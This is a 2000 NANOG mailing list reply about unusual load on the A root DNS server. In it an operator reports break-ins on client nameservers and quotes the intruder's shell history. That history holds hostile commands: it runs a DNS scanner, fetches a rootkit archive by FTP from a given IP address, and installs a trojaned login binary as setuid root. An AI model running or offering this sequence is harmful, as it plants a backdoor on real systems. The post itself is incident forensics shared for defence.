[28269] in North American Network Operators' Group
Re: Question about strain on the A root server
daemon@ATHENA.MIT.EDU (John Fraizer)
Sun Apr 23 02:04:09 2000
Date: Sun, 23 Apr 2000 02:01:16 -0400 (EDT)
From: John Fraizer <nanog@EnterZone.Net>
Reply-To: John Fraizer <nanog@EnterZone.Net>
To: jlewis@lewis.org
Cc: Dirk Harms-Merbitz <dirk@power.net>, nanog@merit.edu
In-Reply-To: <Pine.LNX.4.10.10004230133160.25904-100000@redhat1.mmaero.com>
Message-ID: <Pine.LNX.3.96.1000423014921.10232A-100000@Overkill.EnterZone.Net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Errors-To: owner-nanog-outgoing@merit.edu
On Sun, 23 Apr 2000 jlewis@lewis.org wrote:
> If you're looking at the stats enough to pin down heavy usage to
> individual systems, it shouldn't be too much more work to track down why
> they're suddenly making the top ten list. i.e. is it a bug in their
> resolver, or were they hacked and running some scanner kit that makes
> heavy use of DNS, with A hard-coded into the scanner?
>
While investigating several recent breakins on client machines, I have
found that the latter is most likely the case:
From the .bash_history file that was found on one of the machines:
./t666 1
killall -9 named
./t666 1
./t666 1
./t666 1
ftp 62.0.178.10
tar -zxvf login.tgz
cd login
pico rk.h
./configure
make
cd src
mv login /bin
chmod 4755 /bin/login
ls -ls /bin/login
Sadly, the t666 program was not anywhere to be found on the machine. The
machine that was compromised was a clients nameserver. It was configured
to use our nameservers as forwarders. When the script-kiddy was running
the t666 program, it was beating the hell out of our nameservers. Alarms
went off, we checked the logs and showed thousands of connections open
from their nameserver to ours. When we got into the box, the login.tgz
and .bash_history file are all that was to be found.
----
John Fraizer
EnterZone, Inc
